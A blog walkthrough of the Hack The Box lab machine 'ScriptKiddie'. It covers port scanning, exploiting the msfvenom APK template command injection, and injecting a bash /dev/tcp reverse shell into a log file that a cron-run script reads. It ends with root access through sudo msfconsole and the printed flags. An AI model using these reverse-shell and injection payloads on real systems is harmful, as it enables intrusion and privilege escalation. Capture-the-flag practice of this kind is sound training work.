Hack-The-Box-walkthrough[ScriptKiddie]

Posted on 2021-02-07 Edited on 2021-06-06 In HackTheBox walkthrough Views: Word count in article: 1.3k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 06 Feb 2021
IP: 10.10.10.226

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.226
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 5000 Webapp

Some kind of hacking tool.

When generating any windows or linux payload using the website on port 5000 we discover a /static/payloads/name.exe of generated payloads where we can download from:

payload: windows/meterpreter/reverse_tcp
LHOST: 10.10.14.3
LPORT: 4444
template: None
download: 122f1def6a8b.exe
expires: 5 mins


http://10.10.10.226:5000/static/payloads/122f1def6a8b.exe

We also see that we can provide a template for given payload type we are going to generate

Also there is APK template allowed and after some googling we found out exploit module for APK template which uses command injection:

Rapid7 Metasploit Framework msfvenom APK Template Command Injection

We generated the following apk file and we going to use it as template:

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic

and then got a shell :)

┌──(root💀kali)-[~/hackthebox/machine/ScriptKiddie]
└─# nc -lvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:56260.
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
whoami
kid
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$ cd 
cd 
kid@scriptkiddie:~$ ls
ls
html  logs  snap  user.txt
kid@scriptkiddie:~$ cat user.txt
cat user.txt
b8f1aa40582cab9d40ac5866fbb13ec1

and the user flag…

get root

There is also a second user of name pwn.

After a shell on the box we found a script running as pwn:

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Interesting Pspy64 findings:

2021/02/07 06:36:42 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2021/02/07 06:37:19 CMD: UID=1001 PID=409118 | rm /tmp/f 
2021/02/07 06:37:19 CMD: UID=1001 PID=409122 | nc 10.10.16.117 9000 
2021/02/07 06:37:19 CMD: UID=1001 PID=409121 | /bin/sh -i 
2021/02/07 06:37:19 CMD: UID=1001 PID=409120 | cat /tmp/f 
2021/02/07 06:38:01 CMD: UID=0    PID=409123 | /usr/sbin/CRON -f 
2021/02/07 06:38:01 CMD: UID=0    PID=409125 | find /home/kid/html/static/payloads/ -type f -mmin +5 -delete 
2021/02/07 06:38:01 CMD: UID=0    PID=409124 | /bin/sh -c find /home/kid/html/static/payloads/ -type f -mmin +5 -delete

After quick testing for command injection inside /home/kid/logs/hackers file we were able to put two spaces and then semicolon with our bash reverse shell in order to get command execution (We also commented out the rest of the nmap command with ‘#’ in the script in order to escape the redirection to /dev/null output):

1	;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #

Results:

1	echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/443 0>&1' #" >> hackers

then get a reverse shell

┌──(root💀kali)-[~]
└─# nc -lvp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:57604.
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ whoami
whoami
pwn
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

finally get the root flag

pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > id
stty: 'standard input': Inappropriate ioctl for device
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > whoami
stty: 'standard input': Inappropriate ioctl for device
[*] exec: whoami

root
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > pwd
stty: 'standard input': Inappropriate ioctl for device
[*] exec: pwd

/home/pwn
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cd /root
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > ls
stty: 'standard input': Inappropriate ioctl for device
[*] exec: ls

root.txt
snap
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > cat root.txt
stty: 'standard input': Inappropriate ioctl for device
[*] exec: cat root.txt

f485b5d61b464bdd4fcb17809ad8fa8b
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device